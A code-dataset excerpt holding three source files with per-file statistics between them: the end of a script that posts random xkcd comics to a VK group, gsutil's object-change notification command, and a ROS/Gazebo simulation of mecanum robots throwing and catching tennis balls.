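# upload the image to the VK wall upload server, save it with photos.saveWallPhoto,
# publish it with wall.post on behalf of the group, then delete the local file.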
def main():
load_dotenv()
token = os.getenv("ACCESS_TOKEN")
group_id = "198809484"
last_comic_number = get_last_comic_number()
url = "http://xkcd.com/{}/info.0.json".format(
random.randint(1, last_comic_number))
response = get_response(url, payload={})
comic = response.json()
image_url = comic["img"]
response = get_response(image_url, payload={})
comment = comic["alt"]
filename = "xkcd.png"
try:
with open(filename, "wb") as file:
file.write(response.content)
url_to_upload = get_url_to_upload(token, group_id)
image_server, image_hash, photo = upload_comic_to_server(url_to_upload)
owner_id, media_id = save_comic(
image_server, image_hash, photo, token, group_id)
post_comic(owner_id, media_id, token, comment, group_id)
finally:
os.remove(filename)
if __name__ == "__main__":
main()
| 27.681416
| 79
| 0.636189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 548
| 0.175192
|
620690da1f145b5b2420aa8da8460ba8aab12a29
| 9,636
|
py
|
Python
|
google-cloud-sdk/platform/gsutil/gslib/commands/notification.py
|
KaranToor/MA450
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
[
"Apache-2.0"
] | 1
|
2017-11-29T18:52:27.000Z
|
2017-11-29T18:52:27.000Z
|
google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py
|
KaranToor/MA450
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
[
"Apache-2.0"
] | null | null | null |
google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py
|
KaranToor/MA450
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
[
"Apache-2.0"
] | 1
|
2020-07-25T12:09:01.000Z
|
2020-07-25T12:09:01.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides the notification command to gsutil."""
from __future__ import absolute_import
import getopt
import uuid
from gslib import metrics
from gslib.cloud_api import AccessDeniedException
from gslib.command import Command
from gslib.command import NO_MAX
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.help_provider import CreateHelpText
from gslib.storage_url import StorageUrlFromString
_WATCHBUCKET_SYNOPSIS = """
gsutil notification watchbucket [-i id] [-t token] app_url bucket_url...
"""
_STOPCHANNEL_SYNOPSIS = """
gsutil notification stopchannel channel_id resource_id
"""
_SYNOPSIS = _WATCHBUCKET_SYNOPSIS + _STOPCHANNEL_SYNOPSIS.lstrip('\n')
_WATCHBUCKET_DESCRIPTION = """
<B>WATCHBUCKET</B>
The watchbucket sub-command can be used to watch a bucket for object changes.
A service account must be used when running this command.
The app_url parameter must be an HTTPS URL to an application that will be
notified of changes to any object in the bucket. The URL endpoint must be
a verified domain on your project. See
`Notification Authorization <https://cloud.google.com/storage/docs/object-change-notification#_Authorization>`_
for details.
The optional id parameter can be used to assign a unique identifier to the
created notification channel. If not provided, a random UUID string will be
generated.
The optional token parameter can be used to validate notifications events.
To do this, set this custom token and store it to later verify that
notification events contain the client token you expect.
"""
_STOPCHANNEL_DESCRIPTION = """
<B>STOPCHANNEL</B>
The stopchannel sub-command can be used to stop sending change events to a
notification channel.
The channel_id and resource_id parameters should match the values from the
response of a bucket watch request.
"""
_DESCRIPTION = """
The notification command can be used to configure notifications.
For more information on the Object Change Notification feature, please see:
https://cloud.google.com/storage/docs/object-change-notification
The notification command has two sub-commands:
""" + _WATCHBUCKET_DESCRIPTION + _STOPCHANNEL_DESCRIPTION + """
<B>EXAMPLES</B>
Watch the bucket example-bucket for changes and send notifications to an
application server running at example.com:
gsutil notification watchbucket https://example.com/notify \\
gs://example-bucket
Assign identifier my-channel-id to the created notification channel:
gsutil notification watchbucket -i my-channel-id \\
https://example.com/notify gs://example-bucket
Set a custom client token that will be included with each notification event:
gsutil notification watchbucket -t my-client-token \\
https://example.com/notify gs://example-bucket
Stop the notification event channel with channel identifier channel1 and
resource identifier SoGqan08XDIFWr1Fv_nGpRJBHh8:
gsutil notification stopchannel channel1 SoGqan08XDIFWr1Fv_nGpRJBHh8
<B>NOTIFICATIONS AND PARALLEL COMPOSITE UPLOADS</B>
By default, gsutil enables parallel composite uploads for large files (see
"gsutil help cp"), which means that an upload of a large object can result
in multiple temporary component objects being uploaded before the actual
intended object is created. Any subscriber to notifications for this bucket
will then see a notification for each of these components being created and
deleted. If this is a concern for you, note that parallel composite uploads
can be disabled by setting "parallel_composite_upload_threshold = 0" in your
boto config file.
"""
NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE = """
Watch bucket attempt failed:
{watch_error}
You attempted to watch a bucket with an application URL of:
{watch_url}
which is not authorized for your project. Please ensure that you are using
Service Account authentication and that the Service Account's project is
authorized for the application URL. Notification endpoint URLs must also be
whitelisted in your Cloud Console project. To do that, the domain must also be
verified using Google Webmaster Tools. For instructions, please see:
https://cloud.google.com/storage/docs/object-change-notification#_Authorization
"""
_DETAILED_HELP_TEXT = CreateHelpText(_SYNOPSIS, _DESCRIPTION)
_watchbucket_help_text = (
CreateHelpText(_WATCHBUCKET_SYNOPSIS, _WATCHBUCKET_DESCRIPTION))
_stopchannel_help_text = (
CreateHelpText(_STOPCHANNEL_SYNOPSIS, _STOPCHANNEL_DESCRIPTION))
class NotificationCommand(Command):
"""Implementation of gsutil notification command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'notification',
command_name_aliases=[
'notify', 'notifyconfig', 'notifications', 'notif'],
usage_synopsis=_SYNOPSIS,
min_args=3,
max_args=NO_MAX,
supported_sub_args='i:t:',
file_url_ok=False,
provider_url_ok=False,
urls_start_arg=1,
gs_api_support=[ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments={
'watchbucket': [
CommandArgument.MakeFreeTextArgument(),
CommandArgument.MakeZeroOrMoreCloudBucketURLsArgument()
],
'stopchannel': []
}
)
# Help specification. See help_provider.py for documentation.
help_spec = Command.HelpSpec(
help_name='notification',
help_name_aliases=['watchbucket', 'stopchannel', 'notifyconfig'],
help_type='command_help',
help_one_line_summary='Configure object change notification',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={'watchbucket': _watchbucket_help_text,
'stopchannel': _stopchannel_help_text},
)
def _WatchBucket(self):
"""Creates a watch on a bucket given in self.args."""
self.CheckArguments()
identifier = None
client_token = None
if self.sub_opts:
for o, a in self.sub_opts:
if o == '-i':
identifier = a
if o == '-t':
client_token = a
identifier = identifier or str(uuid.uuid4())
watch_url = self.args[0]
bucket_arg = self.args[-1]
if not watch_url.lower().startswith('https://'):
raise CommandException('The application URL must be an https:// URL.')
bucket_url = StorageUrlFromString(bucket_arg)
if not (bucket_url.IsBucket() and bucket_url.scheme == 'gs'):
raise CommandException(
'The %s command can only be used with gs:// bucket URLs.' %
self.command_name)
if not bucket_url.IsBucket():
raise CommandException('URL must name a bucket for the %s command.' %
self.command_name)
self.logger.info('Watching bucket %s with application URL %s ...',
bucket_url, watch_url)
try:
channel = self.gsutil_api.WatchBucket(
bucket_url.bucket_name, watch_url, identifier, token=client_token,
provider=bucket_url.scheme)
except AccessDeniedException, e:
self.logger.warn(NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE.format(
watch_error=str(e), watch_url=watch_url))
raise
channel_id = channel.id
resource_id = channel.resourceId
client_token = channel.token
self.logger.info('Successfully created watch notification channel.')
self.logger.info('Watch channel identifier: %s', channel_id)
self.logger.info('Canonicalized resource identifier: %s', resource_id)
self.logger.info('Client state token: %s', client_token)
return 0
def _StopChannel(self):
channel_id = self.args[0]
resource_id = self.args[1]
self.logger.info('Removing channel %s with resource identifier %s ...',
channel_id, resource_id)
self.gsutil_api.StopChannel(channel_id, resource_id, provider='gs')
self.logger.info('Successfully removed channel.')
return 0
def _RunSubCommand(self, func):
try:
(self.sub_opts, self.args) = getopt.getopt(
self.args, self.command_spec.supported_sub_args)
# Commands with both suboptions and subcommands need to reparse for
# suboptions, so we log again.
metrics.LogCommandParams(sub_opts=self.sub_opts)
return func()
except getopt.GetoptError, e:
self.RaiseInvalidArgumentException()
def RunCommand(self):
"""Command entry point for the notification command."""
subcommand = self.args.pop(0)
if subcommand == 'watchbucket':
metrics.LogCommandParams(subcommands=[subcommand])
return self._RunSubCommand(self._WatchBucket)
elif subcommand == 'stopchannel':
metrics.LogCommandParams(subcommands=[subcommand])
return self._RunSubCommand(self._StopChannel)
else:
raise CommandException('Invalid subcommand "%s" for the %s command.' %
(subcommand, self.command_name))
| 36.638783
| 113
| 0.732669
| 4,407
| 0.457347
| 0
| 0
| 0
| 0
| 0
| 0
| 5,326
| 0.552719
|
62082f1a3d2df0aa7c200e1ac37a24e5cc695f32
| 18,526
|
py
|
Python
|
src/mecanum_robot_gazebo/src/tool/pingpong_utils.py
|
diddytpq/Predict-Tennisball-LandingPoint
|
0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a
|
[
"MIT"
] | null | null | null |
src/mecanum_robot_gazebo/src/tool/pingpong_utils.py
|
diddytpq/Predict-Tennisball-LandingPoint
|
0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a
|
[
"MIT"
] | null | null | null |
src/mecanum_robot_gazebo/src/tool/pingpong_utils.py
|
diddytpq/Predict-Tennisball-LandingPoint
|
0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a
|
[
"MIT"
] | null | null | null |
import rospy
import sys
from gazebo_msgs.srv import *
from geometry_msgs.msg import *
import tf.transformations as tft
import numpy as np
import math
import roslib
from std_msgs.msg import Empty as EmptyMsg
from std_msgs.msg import Float64
from nav_msgs.msg import Odometry
import time
from tool.mecanum_utils import *
roslib.load_manifest('mecanum_robot_gazebo')
class Make_mecanum_left():
def __init__(self, model_name):
self.model_name = model_name
self.pub = rospy.Publisher("/{}_vel".format(model_name), Twist, queue_size=10)
self.pub_wheel_vel_1 = rospy.Publisher("/{}/wheel_1/command".format(model_name), Float64, queue_size=10)
self.pub_wheel_vel_2 = rospy.Publisher("/{}/wheel_2/command".format(model_name), Float64, queue_size=10)
self.pub_wheel_vel_3 = rospy.Publisher("/{}/wheel_3/command".format(model_name), Float64, queue_size=10)
self.pub_wheel_vel_4 = rospy.Publisher("/{}/wheel_4/command".format(model_name), Float64, queue_size=10)
self.g_get_state = rospy.ServiceProxy("/gazebo/get_model_state", GetModelState)
self.vel_forward = 5.5 #m/s
self.vel_lateral = 1.5 #m/s
self.ball_fly_time = 0.45 #max height time [sec]
self.vel_forward_apply = 0
self.vel_lateral_apply = 0
self.amax = 3
self.spawn_pos_z = 0.5
self.ball_name = 'ball_left::ball_link'
self.torque = [0,20000,0]
self.delete_model_name = "ball_right"
self.twist = Twist()
self.get_position()
self.score = 0
def get_position(self):
self.robot_state = self.g_get_state(model_name=self.model_name)
self.object_pose = Pose()
self.object_pose.position.x = float(self.robot_state.pose.position.x)
self.object_pose.position.y = float(self.robot_state.pose.position.y)
self.object_pose.position.z = float(self.robot_state.pose.position.z)
self.object_pose.orientation.x = float(self.robot_state.pose.orientation.x)
self.object_pose.orientation.y = float(self.robot_state.pose.orientation.y)
self.object_pose.orientation.z = float(self.robot_state.pose.orientation.z)
self.object_pose.orientation.w = float(self.robot_state.pose.orientation.w)
self.angle = qua2eular(self.object_pose.orientation.x, self.object_pose.orientation.y,
self.object_pose.orientation.z, self.object_pose.orientation.w)
#print(self.object_pose.position.x, self.object_pose.position.y, self.object_pose.position.z)
#print(self.angle)
def check_velocity(self, x_vel, y_vel):
if self.vel_forward < abs(x_vel):
if x_vel > 0: x_vel = self.vel_forward
else: x_vel = -self.vel_forward
if self.vel_lateral < abs(y_vel):
if y_vel > 0: y_vel = self.vel_lateral
else: y_vel = -self.vel_lateral
return x_vel, y_vel
def set_x_velocity(self,dt):
if self.x_error > 0:
self.vel_forward_apply += self.amax * dt
if abs(self.vel_forward_apply) > self.vel_forward:
self.vel_forward_apply = self.vel_forward
else :
self.vel_forward_apply -= self.amax * dt
if abs(self.vel_forward_apply) > self.vel_forward:
self.vel_forward_apply = -self.vel_forward
def set_y_velocity(self,dt):
if self.y_error > 0:
self.vel_lateral_apply += self.amax * dt
if abs(self.vel_lateral_apply) > self.vel_lateral:
self.vel_lateral_apply = self.vel_lateral
else :
self.vel_lateral_apply -= self.amax * dt
if abs(self.vel_lateral_apply) > self.vel_lateral:
self.vel_lateral_apply = -self.vel_lateral
def stop(self):
self.vel_forward_apply = 0
self.vel_lateral_apply = 0
self.twist = Twist()
self.twist.linear.x = self.vel_forward_apply
self.twist.linear.y = self.vel_lateral_apply
self.twist.linear.z = 0
self.twist.angular.z = 0
self.wheel_vel = mecanum_wheel_velocity(self.twist.linear.x, self.twist.linear.y, self.twist.angular.z)
self.pub.publish(self.twist)
self.pub_wheel_vel_1.publish(self.wheel_vel[0,:])
self.pub_wheel_vel_2.publish(self.wheel_vel[1,:])
self.pub_wheel_vel_3.publish(self.wheel_vel[2,:])
self.pub_wheel_vel_4.publish(self.wheel_vel[3,:])
def move(self, x_target, y_target, my_mecanum, away_mecanum):
t0 = time.time()
dt = 0
while True:
away_mecanum.break_ball_rolling()
return_home(away_mecanum)
self.score, away_mecanum.score, meg = ball_catch_check(my_mecanum, "ball_right", self.score, away_mecanum.score, away_mecanum)
if meg:
self.stop()
away_mecanum.stop()
break
self.get_position()
t1 = time.time()
dt = t1-t0
self.x_error = x_target - self.object_pose.position.x
self.y_error = y_target - self.object_pose.position.y
if (abs(self.x_error) <0.1 and abs(self.y_error)< 0.1) :
self.stop()
away_mecanum.stop()
else :
self.set_x_velocity(dt)
self.set_y_velocity(dt)
if abs(self.x_error) < 0.1:
self.vel_forward_apply = 0
if abs(self.y_error) < 0.1:
self.vel_lateral_apply = 0
self.twist.linear.x = self.vel_forward_apply
self.twist.linear.y = self.vel_lateral_apply
self.twist.linear.z = 0
self.wheel_vel = mecanum_wheel_velocity(self.twist.linear.x, self.twist.linear.y, self.twist.angular.z)
self.pub.publish(self.twist)
self.pub_wheel_vel_1.publish(self.wheel_vel[0,:])
self.pub_wheel_vel_2.publish(self.wheel_vel[1,:])
self.pub_wheel_vel_3.publish(self.wheel_vel[2,:])
self.pub_wheel_vel_4.publish(self.wheel_vel[3,:])
t0 = time.time()
def spwan_ball(self, name):
self.spawn_name = name
self.cnt = 0
self.total_break_torque = [0, 0, 0]
#time.sleep(0.1)
#print("________________________________________________")
file_localition = roslib.packages.get_pkg_dir('ball_trajectory') + '/urdf/tennis_ball/ball_main.sdf'
srv_spawn_model = rospy.ServiceProxy('/gazebo/spawn_sdf_model', SpawnModel)
self.get_position()
ball_pose = Pose()
ball_pose.position.x = self.object_pose.position.x
ball_pose.position.y = self.object_pose.position.y
ball_pose.position.z = self.object_pose.position.z + self.spawn_pos_z
ball_pose.orientation.x = self.object_pose.orientation.x
ball_pose.orientation.y = self.object_pose.orientation.y
ball_pose.orientation.z = self.object_pose.orientation.z
ball_pose.orientation.w = self.object_pose.orientation.w
file_xml = open(file_localition)
xml_string=file_xml.read()
req = SpawnModelRequest()
req.model_name = self.spawn_name
req.model_xml = xml_string
req.initial_pose = ball_pose
res = srv_spawn_model(req)
def set_ball_target(self):
self.x_target = (np.random.randint(6, 10) + np.random.rand())
self.y_target = (np.random.randint(-3, 3) + np.random.rand())
self.get_position()
self.x_error = self.x_target - self.object_pose.position.x
self.y_error = self.y_target - self.object_pose.position.y
self.s = np.sqrt(self.x_error**2 + self.y_error**2)
def throw_ball(self):
duration = 0.01
self.set_ball_target()
self.yaw_z = np.arctan(self.y_error/self.x_error)
self.ror_matrix = rotation_matrix(self.yaw_z)
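# Simple projectile model: vz0 is the vertical launch speed needed to rise for
# ball_fly_time seconds (vz0 = g*t), h is the resulting apex height above the ground,
# ball_fly_time_plus is the free-fall time from that apex, and v0 is the horizontal
# speed required to cover the ground distance s in the total flight time.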
vz0 = 9.8 * self.ball_fly_time
h = (self.object_pose.position.z + self.spawn_pos_z) + vz0 * self.ball_fly_time - (9.8 * self.ball_fly_time**2)/2
self.ball_fly_time_plus = np.sqrt(2 * h / 9.8)
v0 = self.s/(self.ball_fly_time + self.ball_fly_time_plus)
self.v = np.sqrt(v0**2 + vz0**2)
self.launch_angle = np.arctan(vz0/v0)
self.force = [v0 * 0.057 * 100, 0, vz0 * 0.057 *100 ]
rospy.wait_for_service('/gazebo/apply_body_wrench', timeout=10)
apply_wrench = rospy.ServiceProxy('/gazebo/apply_body_wrench', ApplyBodyWrench)
wrench = Wrench()
self.apply_force, self.apply_torque = get_wrench(self.force, self.torque, self.ror_matrix)
wrench.force = Vector3(*self.apply_force)
wrench.torque = Vector3(*self.apply_torque)
success = apply_wrench(
self.ball_name,
'world',
Point(0, 0, 0),
wrench,
rospy.Time().now(),
rospy.Duration(duration))
"""print("----------------------------------------------------")
v0, rpm = cal(force, torque)
#print("\tx_target : ",self.x_target)
#print("\ty_target : ",self.y_target)
#print("\tx_error, y_error :",x_error,y_error)
#print("\ts : ",s)
print('\tv0: {} \t RPM: {}' .format(v, rpm))
print('\tlaunch angle: ',np.rad2deg(launch_angle))
#print('\tForce [N]: ', force)
#print('\tTorque [Nm]: ', torque)
print('\tvo= : ', force[0]/0.057/100,force[1]/0.057/100,force[2]/0.057/100)"""
def del_ball(self):
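        # Remove the previously thrown ball model from Gazebo.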
srv_delete_model = rospy.ServiceProxy('gazebo/delete_model', DeleteModel)
#req = DeleteModelRequest()
#req.model_name = "ball_right"
res = srv_delete_model(self.delete_model_name)
#time.sleep(0.1)
def break_ball_rolling(self):
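        # Once the ball reports z == 0 (i.e. it is on the ground plane), apply
        # a counter-torque of one sixth of the launch torque, up to 7 times,
        # to damp its rolling.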
self.ball_state = self.g_get_state(model_name = self.spawn_name)
self.ball_pose = Pose()
self.ball_pose.position.x = float(self.ball_state.pose.position.x)
self.ball_pose.position.y = float(self.ball_state.pose.position.y)
self.ball_pose.position.z = float(self.ball_state.pose.position.z)
if abs(self.ball_pose.position.z) == 0 and self.cnt < 7:
duration = 0.01
self.cnt += 1
self.apply_force = [0,0,0]
apply_torque = [-self.apply_torque[0]/6,-self.apply_torque[1]/6,-self.apply_torque[2]/6]
self.total_break_torque = [self.total_break_torque[0] + apply_torque[0], self.total_break_torque[1] + apply_torque[1], self.total_break_torque[2] + apply_torque[2]]
rospy.wait_for_service('/gazebo/apply_body_wrench', timeout=10)
apply_wrench = rospy.ServiceProxy('/gazebo/apply_body_wrench', ApplyBodyWrench)
wrench = Wrench()
wrench.force = Vector3(*self.apply_force)
wrench.torque = Vector3(*apply_torque)
success = apply_wrench(
str(self.delete_model_name) + ":ball_link",
'world',
Point(0, 0, 0),
wrench,
rospy.Time().now(),
rospy.Duration(duration))
"""if self.cnt == 5:
duration = 0.01
self.apply_force = [0,0,0]
apply_torque = [-(self.apply_torque[0] + self.total_break_torque[0]),-(self.apply_torque[1] + self.total_break_torque[1]),-(self.apply_torque[2] + self.total_break_torque[2])]
print(self.apply_torque)
print(self.total_break_torque)
print(apply_torque)
print(np.array(self.total_break_torque) + np.array(apply_torque))
rospy.wait_for_service('/gazebo/apply_body_wrench', timeout=10)
apply_wrench = rospy.ServiceProxy('/gazebo/apply_body_wrench', ApplyBodyWrench)
wrench = Wrench()
wrench.force = Vector3(*self.apply_force)
wrench.torque = Vector3(*apply_torque)
success = apply_wrench(
self.ball_name,
'world',
Point(0, 0, 0),
wrench,
rospy.Time().now(),
rospy.Duration(duration))
#self.cnt += 1"""
class Make_mecanum_right(Make_mecanum_left):
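    # Mirror of Make_mecanum_left: this robot plays the +x half of the court,
    # so its targets and position errors are sign-flipped.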
def set_ball_target(self):
self.x_target = -(np.random.randint(6, 10) + np.random.rand())
self.y_target = (np.random.randint(-3, 3) + np.random.rand())
self.get_position()
self.x_error = self.x_target - self.object_pose.position.x
self.y_error = self.y_target - self.object_pose.position.y
self.s = -np.sqrt(self.x_error**2 + self.y_error**2)
def move(self, x_target, y_target, my_mecanum, away_mecanum):
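        # Same control loop as the left robot, but the incoming ball is
        # "ball_left" and the errors are measured with mirrored sign.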
t0 = time.time()
dt = 0
while True:
return_home(away_mecanum)
away_mecanum.break_ball_rolling()
away_mecanum.score, self.score, meg = ball_catch_check(my_mecanum, "ball_left", away_mecanum.score, self.score, away_mecanum)
if meg:
self.stop()
away_mecanum.stop()
break
self.get_position()
t1 = time.time()
dt = t1 - t0
self.x_error = self.object_pose.position.x - x_target
self.y_error = self.object_pose.position.y - y_target
#print(self.x_error, self.y_error)
            if abs(self.x_error) < 0.1 and abs(self.y_error) < 0.1:
self.stop()
away_mecanum.stop()
else:
self.set_x_velocity(dt)
self.set_y_velocity(dt)
if abs(self.x_error) < 0.1:
self.vel_forward_apply = 0
if abs(self.y_error) < 0.1:
self.vel_lateral_apply = 0
self.twist = Twist()
#print(self.vel_forward_apply, self.vel_lateral_apply)
self.twist.linear.x = self.vel_forward_apply
self.twist.linear.y = self.vel_lateral_apply
self.twist.linear.z = 0
self.wheel_vel = mecanum_wheel_velocity(self.twist.linear.x, self.twist.linear.y, self.twist.angular.z)
self.pub.publish(self.twist)
self.pub_wheel_vel_1.publish(self.wheel_vel[0,:])
self.pub_wheel_vel_2.publish(self.wheel_vel[1,:])
self.pub_wheel_vel_3.publish(self.wheel_vel[2,:])
self.pub_wheel_vel_4.publish(self.wheel_vel[3,:])
t0 = time.time()
def ball_catch_check(mecanum, ball_name, left_score, right_score, away_mecanum):
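    # Return the (possibly updated) scores and a flag that becomes True once
    # the ball is close enough to the robot to count as caught (within 0.6 m
    # in x and y, 1 m in z) or has crossed |x| > 15, in which case the
    # throwing side scores and the ball is deleted.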
meg = False
g_get_state = rospy.ServiceProxy("/gazebo/get_model_state", GetModelState)
ball_state = g_get_state(model_name = ball_name)
mecanum.get_position()
ball_x = ball_state.pose.position.x
ball_y = ball_state.pose.position.y
ball_z = ball_state.pose.position.z
robot_x = mecanum.object_pose.position.x
robot_y = mecanum.object_pose.position.y
robot_z = mecanum.object_pose.position.z
distance = np.sqrt((robot_x - ball_x)**2 + (robot_y - ball_y)**2 + (robot_z - ball_z)**2)
distance_x = abs(ball_x - robot_x)
distance_y = abs(ball_y - robot_y)
distance_z = abs(ball_z - robot_z)
"""print("--------------------------------------------------")
print("\tdistance_x :",distance_x)
print("\tdistance_y :",distance_y)
print("\tdistance_z :",distance_z)
"""
if abs(ball_x) > 15:
left_score, right_score = score_board(left_score, right_score, ball_name)
print("--------------------------------------------------")
print("\tvelocity :", away_mecanum.v)
print("\tangle :", away_mecanum.launch_angle)
    if (distance_x < 0.6 and distance_y < 0.6 and distance_z < 1) or abs(ball_x) > 15:
        mecanum.del_ball()
        meg = True
        return left_score, right_score, meg
    return left_score, right_score, meg
def return_home(home_mecanum):
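    # Drive the given robot back toward its home position (x = -11 for the
    # left robot, x = +11 for the right one, y = 0) while turning it to face
    # the opponent's side.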
home_mecanum.get_position()
robot_x = home_mecanum.object_pose.position.x
robot_y = home_mecanum.object_pose.position.y
robot_z = home_mecanum.object_pose.position.z
robot_angle = np.rad2deg(home_mecanum.angle[2])
if robot_x < 0:
x_error = -11 - robot_x
y_error = -robot_y
home_mecanum.twist.angular.z = -robot_angle/100
    else:
x_error = robot_x - 11
y_error = robot_y
if robot_angle > 0 :
home_mecanum.twist.angular.z = (180 - robot_angle)/100
else:
home_mecanum.twist.angular.z = -(180 + robot_angle)/100
vel_forward_apply, vel_lateral_apply = home_mecanum.check_velocity(home_mecanum.vel_forward * (x_error*0.5),
home_mecanum.vel_lateral * (y_error*0.5))
home_mecanum.twist.linear.x = vel_forward_apply
home_mecanum.twist.linear.y = vel_lateral_apply
home_mecanum.twist.linear.z = 0
home_mecanum.wheel_vel = mecanum_wheel_velocity(home_mecanum.twist.linear.x, home_mecanum.twist.linear.y, home_mecanum.twist.angular.z)
home_mecanum.pub.publish(home_mecanum.twist)
home_mecanum.pub_wheel_vel_1.publish(home_mecanum.wheel_vel[0,:])
home_mecanum.pub_wheel_vel_2.publish(home_mecanum.wheel_vel[1,:])
home_mecanum.pub_wheel_vel_3.publish(home_mecanum.wheel_vel[2,:])
home_mecanum.pub_wheel_vel_4.publish(home_mecanum.wheel_vel[3,:])
    if abs(x_error) < 0.1 and abs(y_error) < 0.1:
home_mecanum.stop()
def score_board(left, right, ball_name):
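    # Increment the score of the side whose ball it is (ball_left -> left,
    # ball_right -> right) and print the updated scoreboard.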
left_score = left
right_score = right
if ball_name == "ball_left":
left_score += 1
if ball_name == "ball_right":
right_score += 1
print("=====================================================")
#print("\n")
print("\t Left \t\t\t Right\t")
print("\t {} \t\t\t {} \t".format(left_score,right_score))
#print("\n")
print("=====================================================")
return left_score, right_score
| 35.558541
| 191
| 0.596837
| 14,592
| 0.78765
| 0
| 0
| 0
| 0
| 0
| 0
| 2,963
| 0.159937
|